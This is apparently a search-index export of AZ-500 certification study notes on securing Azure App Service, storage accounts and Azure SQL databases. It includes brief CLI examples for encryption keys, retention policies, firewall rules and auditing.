        • DevOps optimization - Set up continuous integration and deployment with Azure DevOps, GitHub, BitBucket, Docker Hub, or Azure Container Registry.
        • Global scale with high availability - Scale up or out manually or automatically.
        • Connections to SaaS platforms and on-premises data - Choose from more than 50 connectors for enterprise systems (such as SAP), SaaS services (such as Salesforce), and internet services (such as Facebook). Access on-premises data using Hybrid Connections and Azure Virtual Networks.
        • Security and compliance - The App Service is ISO, SOC, and PCI compliant. Authenticate users with Microsoft Entra ID, Google, Facebook, Twitter, or Microsoft account. Create IP address restrictions and manage service identities. Prevent subdomain takeovers.
        • Application templates - Choose from an extensive list of application templates in the Azure Marketplace, such as WordPress, Joomla, and Drupal.
        • Visual Studio and Visual Studio Code integration - Dedicated tools in Visual Studio and Visual Studio Code streamline the work of creating, deploying, and debugging.
        • API and mobile features - App Service provides turn-key CORS support for RESTful API scenarios and simplifies mobile app scenarios by enabling authentication, offline data sync, push notifications, and more.
        • Serverless code - Run a code snippet or script on-demand without having to explicitly provision or manage infrastructure and pay only for the compute time your code actually uses.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#26-app-service-environment","title":"2.6. App Service Environment","text":"

        An\u00a0App Service Environment\u00a0is an Azure App Service feature that provides a fully isolated and dedicated environment for running App Service apps securely at high scale. An App Service Environment can host:

        • Windows web apps
        • Linux web apps
        • Docker containers (Windows\u00a0and\u00a0Linux)
        • Functions
        • Logic apps (Standard)

        App Service Environments have many use cases, including:

        • Internal line-of-business applications.
        • Applications that need more than 30 App Service plan instances.
        • Single-tenant systems to satisfy internal compliance or security requirements.
        • Network-isolated application hosting.
        • Multi-tier applications.

        There are many networking features that enable apps in a multi-tenant App Service to reach network-isolated resources or become network-isolated themselves. These features are enabled at the application level. With an App Service Environment, no added configuration is required for the apps to be on a virtual network. The apps are deployed into a network-isolated environment that's already on a virtual network. If you really need a complete isolation story, you can also deploy your App Service Environment onto dedicated hardware.

        Dedicated environment. - An App Service Environment is a single-tenant deployment of Azure App Service that runs on your virtual network:

        • Applications are hosted in App Service plans (which are a provisioning profile for an application host.)
        • App Service plans are created in an App Service Environment.

        Scaling out an App Service plan: you create more application hosts with all the apps in that App Service plan on each host.

        • A single App Service Environment v3 can have up to 200 total App Service plan instances across all the App Service plans combined.
        • A single App Service Isolated v2 (Iv2) plan can have up to 100 instances by itself.
        • When you're deploying onto dedicated hardware (hosts), you're limited in scaling across all App Service plans to the number of cores in this type of environment. An App Service Environment that's deployed on dedicated hosts has 132 vCores available. I1v2 uses two vCores, I2v2 uses four vCores, and I3v2 uses eight vCores per instance.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#27-azure-app-service-plan","title":"2.7. Azure App Service plan","text":"

        An app service always runs in an\u00a0App Service plan. In addition, Azure Functions also has the option of running in an App Service plan. An App Service plan defines a set of compute resources for a web app to run. These compute resources are analogous to the server farm in conventional web hosting. One or more apps can be configured to run on the same computing resources (or in the same App Service plan).

        Each App Service plan defines:

        • Operating System (Windows, Linux)
        • Region (West US, East US, etc.)
        • Number of VM instances
        • Size of VM instances (Small, Medium, Large)
        • Pricing tier (Free, Shared, Basic, Standard, Premium, PremiumV2, PremiumV3, Isolated, IsolatedV2). This determines what App Service features you get and how much you pay for the plan.

        When you create an App Service plan in a certain region (for example, West Europe), a set of compute resources is created for that plan in that region. Whatever apps you put into this App Service plan run on these compute resources as defined by your App Service plan.

        The pricing tiers available to your App Service plan depend on the operating system selected at creation time. There are a few categories of pricing tiers:

        • Shared compute: Free and Shared, the two base tiers, runs an app on the same Azure VM as other App Service apps, including apps of other customers. These tiers allocate CPU quotas to each app that runs on the shared resources, and the resources cannot scale out.
        • Dedicated compute: The Basic, Standard, Premium, PremiumV2, and PremiumV3 tiers run apps on dedicated Azure VMs. Only apps in the same App Service plan share the same compute resources. The higher the tier, the more VM instances are available to you for scale-out.
        • Isolated: This Isolated and IsolatedV2 tiers run dedicated Azure VMs on dedicated Azure Virtual Networks. It provides network isolation on top of compute isolation to your apps. It provides the maximum scale-out capabilities.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#28-app-service-environment-networking","title":"2.8. App Service Environment networking","text":"

        App Service Environment is a single-tenant deployment of Azure App Service that hosts Windows and Linux containers, web apps, API apps, logic apps, and function apps. When you install an App Service Environment, you pick the Azure virtual network that you want it to be deployed in. All of the inbound and outbound application traffic is inside the virtual network you specify. You deploy into a single subnet in your virtual network, and nothing else can be deployed into that subnet.

        Subnet requirements. - You must delegate the subnet to Microsoft.Web/hostingEnvironments, and the subnet must be empty. The size of the subnet can affect the scaling limits of the App Service plan instances within the App Service Environment. It's a good idea to use a /24 address space (256 addresses) for your subnet to ensure enough addresses to support production scale.

        Windows Containers uses an additional IP address per app for each App Service plan instance, and you need to size the subnet accordingly. If your App Service Environment has, for example, 2 Windows Container App Service plans, each with 25 instances and each with 5 apps running, you will need 300 IP addresses and additional addresses to support horizontal (up/down) scale.

        The minimal size of your subnet is a /27 address space (32 addresses). Any particular subnet has five addresses reserved for management purposes. In addition to the management addresses, App Service Environment dynamically scales the supporting infrastructure and uses between 4 and 27 addresses, depending on the configuration and load. You can use the remaining addresses for instances in the App Service plan.

        If you run out of addresses within your subnet, you can be restricted from scaling out your App Service plans in the App Service Environment. Another possibility is that you can experience increased latency during intensive traffic load if Microsoft can't scale the supporting infrastructure.

        App Service Environment has the following network information at creation:

        Address type Description App Service Environment virtual network The virtual network deployed into. App Service Environment subnet The subnet deployed into. Domain suffix The domain suffix that is used by the apps made. Virtual IP (VIP) The VIP type is used. The two possible values are internal and external. Inbound address The inbound address is the address at which your apps are reached. If you have an internal VIP, it's an address in your App Service Environment subnet. If the address is external, it's a public-facing address. Default outbound addresses The apps use this address, by default, when making outbound calls to the internet.

        As you scale your App Service plans in your App Service Environment, you'll use more addresses from your subnet. Apps in the App Service Environment don't have dedicated addresses in the subnet. The specific addresses an app uses in the subnet will change over time.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#29-availability-zone-support-for-app-service-environments","title":"2.9. Availability Zone Support for App Service Environments","text":"

        Azure App Service Environment can be deployed across\u00a0availability zones (AZ)\u00a0to help you achieve resiliency and reliability for your business-critical workloads. This architecture is also known as zone redundancy.

        When you configure it to be zone redundant, the platform automatically spreads the instances of the Azure App Service plan across three zones in the selected region. This means that the minimum App Service Plan instance count will always be three. If you specify a capacity larger than three, and the number of instances is divisible by three, the instances are spread evenly. Otherwise,\u00a0instance counts beyond 3*N\u00a0are spread across the remaining one or two zones.

        • You configure availability zones when you create your App Service Environment.
        • You can only specify availability zones when creating a new App Service Environment, not later.
        • Availability zones are\u00a0only supported in a subset of regions.

        Since you can't convert pre-existing App Service Environments to use availability zones, migration will consist of a side-by-side deployment where you'll create a new App Service Environment with availability zones enabled. For more information on App Service Environment migration options, see App Service Environment migration.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#210-app-service-environment-certificates","title":"2.10. App Service Environment Certificates","text":"

        Azure App Service\u00a0provides a highly scalable, self-patching web hosting service. Once the certificate is added to your App Service app or function app, you can secure a\u00a0custom Domain Name System (DNS)\u00a0name with it or use it in your application code.

        A certificate uploaded into an app is stored in a deployment unit that is bound to the app service plan's resource group and region combination (internally called a webspace). This makes the certificate accessible to other apps in the same resource group and region combination.

        The following lists are options for adding certificates in App Service:

        • Create a free App Service managed certificate: A private certificate that's free of charge and easy to use if you just need to secure your custom domain in App Service.
        • Purchase an App Service certificate: A private certificate that's managed by Azure. It combines the simplicity of automated certificate management and the flexibility of renewal and export options.
        • Import a certificate from Key Vault: Useful if you use Azure Key Vault to manage your\u00a0Public-Key Cryptography Standards #12 (PKCS12)\u00a0certificates.
        • Upload a private certificate: If you already have a private certificate from a third-party provider, you can upload it.
        • Upload a public certificate: Public certificates are not used to secure custom domains, but you can load them into your code if you need them to access remote resources.

        **Prerequisites: **

        • Create an App Service app.
        • For a private certificate, make sure that it satisfies all requirements from App Service.
        • Free certificate only:
          • Map the domain you want a certificate for to App Service.
          • For a root domain (like contoso.com), make sure your app doesn't have any IP restrictions configured. Both certificate creation and its periodic renewal for a root domain depends on your app being reachable from the internet.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#3-storage-security","title":"3. Storage Security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#31-data-sovereignty","title":"3.1. Data sovereignty","text":"

        Data sovereignty is the concept that information, which has been converted and stored in binary digital form, is subject to the laws of the country or region in which it is located. We recommend that you configure business continuity and disaster recovery (BCDR) across regional pairs to benefit from Azure\u2019s isolation and VM policies.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#32-configure-azure-storage-access","title":"3.2. Configure Azure storage access","text":"

        Options for authorizing requests to Azure Storage include:

        • Microsoft Entra ID\u00a0- Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. When you use Microsoft Entra ID to authorize requests make from your applications, you avoid having to store your account access key with your code, as you do with Shared Key authorization. While you can continue to use Shared Key authorization with your blob and queue applications, Microsoft recommends moving to Microsoft Entra ID where possible.
        • Microsoft Entra Domain Services authorization\u00a0for Azure Files. Azure Files supports identity-based authorization over Server Message Block (SMB) through Microsoft Entra Domain Services. You can use RBAC for fine-grained control over a client's access to Azure Files resources in a storage account
        • Shared Key\u00a0- Shared Key authorization relies on your account access keys and other parameters to produce an encrypted signature string that is passed on via the request in the Authorization header.
        • Shared Access Signatures\u00a0- A shared access signature (SAS) is a URI that grants restricted access rights to Azure Storage resources. You can provide a shared access signature to clients who should not be trusted with your storage account key but to whom you wish to delegate access to certain storage account resources. By distributing a shared access signature URI to these clients, you can grant them access to a resource for a specified period of time, with a specified set of permissions. The URI query parameters comprising the SAS token incorporate all of the information necessary to grant controlled access to a storage resource. A client who is in possession of the SAS can make a request against Azure Storage with just the SAS URI, and the information contained in the SAS token is used to authorize the request.
        • Anonymous access to containers and blobs\u00a0- You can enable anonymous, public read access to a container and its blobs in Azure Blob storage. By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature (SAS).
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#33-deploy-shared-access-signatures","title":"3.3. Deploy shared access signatures","text":"

        As a best practice, you shouldn't share storage account keys with external third-party applications. For untrusted clients, use a\u00a0shared access signature\u00a0(SAS).

        A shared access signature is a string that contains a security token that can be attached to a URI. Use a shared access signature to delegate access to storage objects and specify constraints, such as the permissions and the time range of access.

        -\u00a0Service-level\u00a0shared access signature allows access to specific resources in a storage account. You'd use this type of shared access signature, for example, to allow an app to retrieve a list of files in a file system or to download a file. It is used to delegate access to a resource in either Blob storage, Queue storage, Table storage, or Azure Files. - Account-level\u00a0shared access signature allows access to anything that a service-level shared access signature can allow, plus additional resources and abilities. For example, you can use an account-level shared access signature to allow the ability to create file systems. - User delegation SAS, introduced with version 2018-11-09, is secured with Microsoft Entra credentials. This type of SAS is supported for the Blob service only and can be used to grant access to containers and blobs.

        One would typically use a shared access signature for a service where users read and write their data to your storage account. Accounts that store user data have two typical designs:

        • Clients upload and download data through a front-end proxy service, which performs authentication. This front-end proxy service has the advantage of allowing validation of business rules. But if the service must handle large amounts of data or high-volume transactions, you might find it complicated or expensive to scale this service to match demand.

        • A lightweight service authenticates the client as needed. Then it generates a shared access signature. After receiving the shared access signature, the client can access storage account resources directly. The shared access signature defines the client's permissions and access interval. The shared access signature reduces the need to route all data through the front-end proxy service.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#34-manage-microsoft-entra-storage-authentication","title":"3.4. Manage Microsoft Entra storage authentication","text":"

        Azure Storage provides integration with Microsoft Entra ID for identity-based authorization of requests to the Blob and Queue services. With Microsoft Entra ID, you can use Azure role-based access control (Azure RBAC) to grant permissions to a security principal, which may be a user, group, or application service principal. The security principal is authenticated by Microsoft Entra ID to return an OAuth 2.0 token. The token can then be used to authorize a request against the Blob service.

        Authorization with Microsoft Entra ID is available for all general-purpose and Blob storage accounts in all public regions and national clouds. Only storage accounts created with the Azure Resource Manager deployment model support Microsoft Entra authorization. Blob storage additionally supports creating shared access signatures (SAS) that is signed with Microsoft Entra credentials.

        When a security principal (a user, group, or application) attempts to access a queue resource, the request must be authorized. With Microsoft Entra ID, access to a resource is a two-step process. First, the security principal's identity is authenticated, and an OAuth 2.0 token is returned. Next, the token is passed as part of a request to the Queue service and used by the service to authorize access to the specified resource. The authentication step requires that an application request an OAuth 2.0 access token at runtime. If an application is running from within an Azure entity, such as an Azure VM, a Virtual Machine Scale Set, or an Azure Functions app, it can use a managed identity to access queues.

        The authorization step requires one or more Azure roles to be assigned to the security principal. Native and web applications that request the Azure Queue service can also authorize access with Microsoft Entra ID.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#35-implement-storage-service-encryption","title":"3.5. Implement storage service encryption","text":"
        • All data (including metadata) written to Azure Storage is automatically encrypted using Storage Service Encryption (SSE).
        • Microsoft Entra ID and Role-Based Access Control (RBAC) are supported for Azure Storage for both resource management operations and data operations, as follows:
          • You can assign RBAC roles scoped to the storage account to security principals and use Microsoft Entra ID to authorize resource management operations such as key management.
          • Microsoft Entra integration is supported for blob and queue data operations. You can assign RBAC roles scoped to a subscription, resource group, storage account, or an individual container or queue to a security principal or a managed identity for Azure resources.
        • Data can be secured in transit between an application and Azure by using Client-Side Encryption, HTTPS, or SMB 3.0.
        • OS and data disks used by Azure virtual machines can be encrypted using Azure Disk Encryption.
        • Delegated access to the data objects in Azure Storage can be granted using a shared access signature.

        Azure Storage Service Encryption (SSE) for data at rest. -

        • When a new storage account is provisioned, Azure Storage Encryption is automatically enabled for it and it cannot be disabled. Storage accounts are encrypted regardless of their performance tier (standard or premium) or deployment model (Azure Resource Manager or classic). All Azure Storage redundancy options support encryption, and all copies of a storage account are encrypted. All Azure Storage resources are encrypted, including blobs, disks, files, queues, and tables. All object metadata is also encrypted.
        • Data in Azure Storage is encrypted and decrypted transparently using 256-bit AES encryption, one of the strongest block ciphers available, and is FIPS 140-2 compliant.
        • Azure Storage encryption is similar to BitLocker encryption on Windows.
        • Encryption does not affect Azure Storage performance. There is no additional cost for Azure Storage encryption.

        Encryption key management

        You can rely on Microsoft-managed keys for the encryption of your storage account, or you can manage encryption with your own keys. If you choose to manage encryption with your own keys, you have two options:

        • You can specify a\u00a0customer-managed\u00a0key to use for encrypting and decrypting all data in the storage account. A customer-managed key is used to encrypt all data in all services in your storage account.
        • You can specify a\u00a0customer-provided\u00a0key on Blob storage operations. A client making a read or write request against Blob storage can include an encryption key on the request for granular control over how blob data is encrypted and decrypted.
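        As a sketch (hypothetical names, and assuming the key vault already holds the key and grants the storage account's managed identity wrap/unwrap permissions), switching a storage account to a customer-managed key might look like:

        ```
        # Give the storage account a system-assigned managed identity
        az storage account update --name mystorageacct --resource-group rg1 --assign-identity

        # Point encryption at a key in Azure Key Vault
        az storage account update \
            --name mystorageacct \
            --resource-group rg1 \
            --encryption-key-source Microsoft.Keyvault \
            --encryption-key-vault https://myvault.vault.azure.net \
            --encryption-key-name mykey
        ```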

        The following table compares key management options for Azure Storage encryption.

        | | Microsoft-managed keys | Customer-managed keys | Customer-provided keys |
        |---|---|---|---|
        | Encryption/decryption operations | Azure | Azure | Azure |
        | Azure Storage services supported | All | Blob storage, Azure Files | Blob storage |
        | Key storage | Microsoft key store | Azure Key Vault | Azure Key Vault or any other key store |
        | Key rotation responsibility | Microsoft | Customer | Customer |
        | Key usage | Microsoft | Azure portal, Storage Resource Provider REST API, Azure Storage management libraries, PowerShell, CLI | Azure Storage REST API (Blob storage), Azure Storage client libraries |
        | Key access | Microsoft only | Microsoft, Customer | Customer only |

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#36-configure-blob-data-retention-policies","title":"3.6. Configure blob data retention policies","text":"

        Immutable storage in Azure Blob storage:

        Immutable storage for Azure Blob storage enables users to store business-critical data objects in a WORM (Write Once, Read Many) state. Immutable storage is available for general-purpose v2 and Blob storage accounts in all Azure regions.

        Time-based retention policy support: Users can set policies to store data for a specified interval. When a time-based retention policy is set, blobs can be created and read, but not modified or deleted. After the retention period has expired, blobs can be deleted but not overwritten. When a time-based retention policy is applied on a container, all blobs in the container will stay in the immutable state for the duration of the effective retention period. The effective retention period for blobs is equal to the difference between the blob's creation time and the user-specified retention interval. Because users can extend the retention interval, immutable storage uses the most recent value of the user-specified retention interval to calculate the effective retention period.

        Legal hold policy support: If the retention interval is not known, users can set legal holds to store immutable data until the legal hold is cleared. When a legal hold policy is set, blobs can be created and read, but not modified or deleted. Each legal hold is associated with a user-defined alphanumeric tag (such as a case ID, event name, etc.) that is used as an identifier string. Legal holds are temporary holds that can be used for legal investigation purposes or general protection policies. Each legal hold policy needs to be associated with one or more tags. Tags are used as a named identifier, such as a case ID or event, to categorize and describe the purpose of the hold.

        Support for all blob tiers: WORM policies are independent of the Azure Blob storage tier and apply to all the tiers: hot, cool, and archive. Users can transition data to the most cost-optimized tier for their workloads while maintaining data immutability.

        Container-level configuration: Users can configure time-based retention policies and legal hold tags at the container level. By using simple container-level settings, users can create and lock time-based retention policies, extend retention intervals, set and clear legal holds, and more. These policies apply to all the blobs in the container, both existing and new.

        Audit logging support: Each container includes a policy audit log. It shows up to seven time-based retention commands for locked time-based retention policies and contains the user ID, command type, time stamps, and retention interval. For legal holds, the log contains the user ID, command type, time stamps, and legal hold tags. This log is retained for the lifetime of the policy, in accordance with the SEC 17a-4(f) regulatory guidelines. The Azure Activity Log shows a more comprehensive log of all the control plane activities; while enabling Azure Resource Logs retains and shows data plane operations. It is the user's responsibility to store those logs persistently, as might be required for regulatory or other purposes.

        A container can have both a legal hold and a time-based retention policy at the same time. All blobs in that container stay in the immutable state until all legal holds are cleared, even if their effective retention period has expired. Conversely, a blob stays in an immutable state until the effective retention period expires, even if all legal holds have been cleared.
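        A hedged CLI sketch of both policy types on a hypothetical container (flag names per the az storage container immutability-policy and legal-hold command groups):

        ```
        # Time-based retention: blobs immutable for 365 days from creation
        az storage container immutability-policy create \
            --resource-group rg1 \
            --account-name mystorageacct \
            --container-name audit-logs \
            --period 365

        # Legal hold: immutable until the tagged hold is cleared
        az storage container legal-hold set \
            --account-name mystorageacct \
            --container-name audit-logs \
            --tags case-2024-001
        ```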

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#37-storage-account-keys","title":"3.7. Storage Account Keys","text":"

        Storage account keys are generated by Azure when you create the storage account. Azure generates two 512-bit keys. You use these keys to authorize access to data that resides in your storage account via Shared Key authorization. Azure Key Vault simplifies this process and allows you to rotate keys without interrupting your applications.
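        For example (hypothetical names; the accepted --key values may vary by CLI version, so check az storage account keys renew --help):

        ```
        # List both 512-bit keys
        az storage account keys list --account-name mystorageacct --resource-group rg1

        # Rotate (regenerate) one of them
        az storage account keys renew \
            --account-name mystorageacct \
            --resource-group rg1 \
            --key primary
        ```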

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#38-configure-azure-files-authentication","title":"3.8. Configure Azure files authentication","text":"

        Azure Files supports identity-based authentication over Server Message Block (SMB) through on-premises Active Directory Domain Services (AD DS) and Microsoft Entra Domain Services. With RBAC, the credentials you use for file access should be available or synced to Microsoft Entra ID.

        Azure Files enforces authorization on user access to both the share and the directory/file levels.

        At the directory/file level, Azure Files supports preserving, inheriting, and enforcing Windows DACLs just like any Windows file servers. You can choose to keep Windows DACLs when copying data over SMB between your existing file share and your Azure file shares. Whether you plan to enforce authorization or not, you can use Azure file shares to back up ACLs along with your data.

        Benefits of Identity-based authentication over using Shared Key authentication:

        • Extend the traditional identity-based file share access experience to the cloud with on-premises AD DS and Microsoft Entra Domain Services.
        • Enforce granular access control on Azure file shares.
        • Back up Windows ACLs (also known as NTFS ACLs) along with your data. You can copy ACLs on a directory or file to Azure file shares using either Azure File Sync or common file movement toolsets. For example, you can use robocopy with the /copy:s flag to copy data as well as ACLs to an Azure file share. ACLs are preserved by default; you are not required to enable identity-based authentication on your storage account to preserve ACLs.

        How it works:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#39-enable-the-secure-transfer-required-property","title":"3.9. Enable the secure transfer required property","text":"

        You can configure your storage account to accept requests from secure connections only by setting the Secure transfer required property for the storage account. When you require secure transfer, any requests originating from an insecure connection are rejected. Microsoft recommends that you always require secure transfer for all of your storage accounts.

        Connecting to an Azure file share over SMB without encryption fails when secure transfer is required for the storage account. Examples of insecure connections include those made over SMB 2.1, SMB 3.0 without encryption, or some versions of the Linux SMB client. In other words, when secure transfer is required, Azure Files connections must use encrypted SMB.

        By default, the Secure transfer required property is enabled when you create a storage account. Because Azure Storage doesn't support HTTPS for custom domain names, this option is not applied when you're using a custom domain name.
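        A one-liner sketch with hypothetical names:

        ```
        # Reject any request made over an insecure connection
        az storage account update --name mystorageacct --resource-group rg1 --https-only true
        ```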

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#4-sql-database-security","title":"4. SQL database security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#41-sql-database-authentication","title":"4.1. SQL database authentication","text":"

        A user is authenticated using one of the following two authentication methods:

        • SQL authentication\u00a0- With this authentication method, the user submits a user account name and associated password to establish a connection. This password is stored in the master database for user accounts linked to a login or stored in the database containing the user accounts not linked to a login.
        • Microsoft Entra authentication\u00a0- With this authentication method, the user submits a user account name and requests that the service use the credential information stored in Microsoft Entra ID.

        You can create user accounts in the master database and grant permissions in all databases on the server, or you can create them in the database itself (called contained database users). By using contained databases, you obtain enhanced portability and scalability.

        Logins and users: In Azure SQL, a user account in a database can be associated with a login that is stored in the master database or can be a user name that is stored in an individual database.

        • A\u00a0login\u00a0is an individual account in the master database, to which a user account in one or more databases can be linked. With a login, the credential information for the user account is stored with the login.
        • A\u00a0user account\u00a0is an individual account in any database that may be but does not have to be linked to a login. With a user account that is not linked to a login, the credential information is stored with the user account.

        Authorization to access data and perform various actions is managed using database roles and explicit permissions. Authorization is controlled by your user account's database role memberships and object-level permissions.

        Best practices:

        • Grant users the least privileges necessary.
        • Your application should use a dedicated account to authenticate.
        • Recommendation: create a contained database user, which allows your app to authenticate directly to the database (see the sketch below).

        Use Microsoft Entra authentication to centrally manage identities of database users and as an alternative to SQL Server authentication.
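        A sketch of the contained-user recommendation, run from bash with sqlcmd (server, database, and user names are hypothetical; -G authenticates with Microsoft Entra ID):

        ```
        sqlcmd -S myserver.database.windows.net -d mydb -G -Q "
        -- SQL-authenticated contained user (no login in master)
        CREATE USER [app_user] WITH PASSWORD = '<strong-password>';
        ALTER ROLE db_datareader ADD MEMBER [app_user];

        -- Microsoft Entra-based contained user
        CREATE USER [appidentity@contoso.com] FROM EXTERNAL PROVIDER;
        "
        ```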

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#42-configure-sql-database-firewalls","title":"4.2. Configure SQL database firewalls","text":"

        Azure SQL Database and Azure Synapse Analytics, previously SQL Data Warehouse, (both referred to as SQL Database in this lesson) provide a relational database service for Azure and other internet-based applications.

        Initially, all access to your Azure SQL Database is blocked by the SQL Database firewall.

        The firewall grants access to databases based on:

        • the originating IP address of each request, or
        • virtual network rules based on virtual network service endpoints. Virtual network rules might be preferable to IP rules in some cases.

        Azure SQL Firewall IP rules:

        • Server-level IP firewall rules allow clients to access the entire Azure SQL server, which includes all databases hosted in it. The master database holds these rules, and you can configure a maximum of 128 server-level IP firewall rules for an Azure SQL server, using the Azure portal, PowerShell, or Transact-SQL statements. To create server-level IP firewall rules using the Azure portal or PowerShell, you must be the subscription owner or a subscription contributor. To create a server-level IP firewall rule using Transact-SQL, you must connect to the SQL Database instance as the server-level principal login or the Microsoft Entra administrator (which means that a server-level IP firewall rule must have first been created by a user with Azure-level permissions).
        • Database-level IP firewall rules are used to allow access to specific databases on a SQL Database server. You can create them for each database, including the master database, again with a maximum of 128 rules. You can only create and manage database-level IP firewall rules for master databases and user databases by using Transact-SQL statements, and only after you have configured the first server-level firewall.

        Azure Synapse Analytics only supports server-level IP firewall rules, and not database-level IP firewall rules.

        Database-level IP firewall rules are evaluated first:

        To allow applications from Azure to connect to your Azure SQL Database, Azure connections must be enabled. When an application from Azure attempts to connect to your database server, the firewall verifies that Azure connections are allowed. A firewall setting with starting and ending addresses equal to 0.0.0.0 indicates Azure connections are allowed. This option configures the firewall to allow all connections from Azure including connections from the subscriptions of other customers. When selecting this option, make sure your sign-in and user permissions limit access to authorized users only.

        Whenever possible, as a best practice, use database-level IP firewall rules to enhance security and to make your database more portable. Use server-level IP firewall rules for administrators and when you have several databases with the same access requirements, and you don't want to spend time configuring each database individually.
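        A sketch of both rule levels (hypothetical names and IP range):

        ```
        # Server-level rule via the CLI
        az sql server firewall-rule create \
            --resource-group rg1 \
            --server myserver \
            --name office-range \
            --start-ip-address 203.0.113.10 \
            --end-ip-address 203.0.113.20

        # Database-level rule via T-SQL, run inside the target database
        sqlcmd -S myserver.database.windows.net -d mydb -G -Q \
            "EXECUTE sp_set_database_firewall_rule N'office-range', '203.0.113.10', '203.0.113.20';"
        ```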

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#43-enable-and-monitor-database-auditing","title":"4.3. Enable and monitor database auditing","text":"

        Auditing for Azure SQL Database and Azure Synapse Analytics tracks database events and writes them to an audit log in your Azure storage account, Log Analytics workspace or Event Hubs.

        Auditing also:

        • Helps you maintain regulatory compliance, understand database activity, and gain insight into discrepancies and anomalies that could indicate business concerns or suspected security violations.
        • Enables and facilitates adherence to compliance standards, although it\u00a0doesn't guarantee compliance.

        You can use SQL database auditing to:

        • Retain\u00a0an audit trail of selected events. You can define categories of database actions to be audited.
        • Report\u00a0on database activity. You can use pre-configured reports and a dashboard to get started quickly with activity and event reporting.
        • Analyze\u00a0reports. You can find suspicious events, unusual activity, and trends.

        In auditing, server-level auditing policies take precedence over database-level auditing policies. This means that:

        • A server policy applies to all existing and newly created databases on the server.
        • If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings.
        • Enabling auditing on the database or data warehouse, in addition to enabling it on the server, does not override or change any of the settings of the server auditing. Both audits will exist side by side. In other words, the database is audited twice in parallel; once by the server policy and once by the database policy.
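        A hedged sketch of enabling server-level auditing to a storage account with the Azure CLI (hypothetical names; parameter spellings per the az sql server audit-policy command group):

        ```
        az sql server audit-policy update \
            --resource-group rg1 \
            --name myserver \
            --state Enabled \
            --blob-storage-target-state Enabled \
            --storage-account mystorageacct
        ```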
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-3-data-and-applications/#44-implement-data-discovery-and-classification","title":"4.4. Implement data discovery and classification","text":"

        Data discovery and classification provides advanced capabilities built into Azure SQL Database for discovering, classifying, labeling and protecting sensitive data (such as business, personal data, and financial information) in your databases. Discovering and classifying this data can play a pivotal role in your organizational information protection stature. It can serve as infrastructure for:

        • Helping meet data privacy standards and regulatory compliance requirements.
        • Addressing various security scenarios such as monitoring, auditing, and alerting on anomalous access to sensitive data.
        • Controlling access to and hardening the security of databases containing highly sensitive data.

        Data exists in one of three basic states: at\u00a0rest, in\u00a0process, and in\u00a0transit. All three states require unique technical solutions for data classification, but the applied principles of data classification should be the same for each. Data that is classified as confidential needs to stay confidential when at rest, in process, or in transit.

        Data can also be either\u00a0structured\u00a0or\u00a0unstructured. Typical classification processes for structured data found in databases and spreadsheets are less complex and time-consuming to manage than those for unstructured data such as documents, source code, and email. Generally, organizations will have more unstructured data than structured data.

        Protect data at rest

        | Best practice | Solution |
        |---|---|
        | Apply disk encryption to help safeguard your data. | Use Microsoft Azure Disk Encryption, which enables IT administrators to encrypt both Windows infrastructure as a service (IaaS) and Linux IaaS virtual machine (VM) disks. Disk encryption combines the industry-standard BitLocker feature and the Linux DM-Crypt feature to provide volume encryption for the operating system (OS) and the data disks. Azure Storage and Azure SQL Database encrypt data at rest by default, and many services offer encryption as an option. You can use Azure Key Vault to maintain control of keys that access and encrypt your data. |
        | Use encryption to help mitigate risks related to unauthorized data access. | Encrypt your drives before you write sensitive data to them. |

        Protect data in transit

        We generally recommend that you always use SSL/TLS protocols to exchange data across different locations. In some circumstances, you might want to isolate the entire communication channel between your on-premises and cloud infrastructures by using a VPN. For data moving between your on-premises infrastructure and Azure, consider appropriate safeguards such as HTTPS or VPN. When sending encrypted traffic between an Azure virtual network and an on-premises location over the public internet, use Azure VPN Gateway.

        | Best practice | Solution |
        |---|---|
        | Secure access from multiple workstations located on-premises to an Azure virtual network | Use site-to-site VPN. |
        | Secure access from an individual workstation located on-premises to an Azure virtual network | Use point-to-site VPN. |
        | Move larger data sets over a dedicated high-speed wide area network (WAN) link | Use Azure ExpressRoute. If you choose to use ExpressRoute, you can also encrypt the data at the application level by using SSL/TLS or other protocols for added protection. |
        | Interact with Azure Storage through the Azure portal | All transactions occur via HTTPS. You can also use the Storage REST API over HTTPS to interact with Azure Storage and Azure SQL Database. |

        Data discovery and classification is part of the Advanced Data Security offering, which is a unified package for advanced Microsoft SQL Server security capabilities. You access and manage data discovery and classification via the central SQL Advanced Data Security portal.

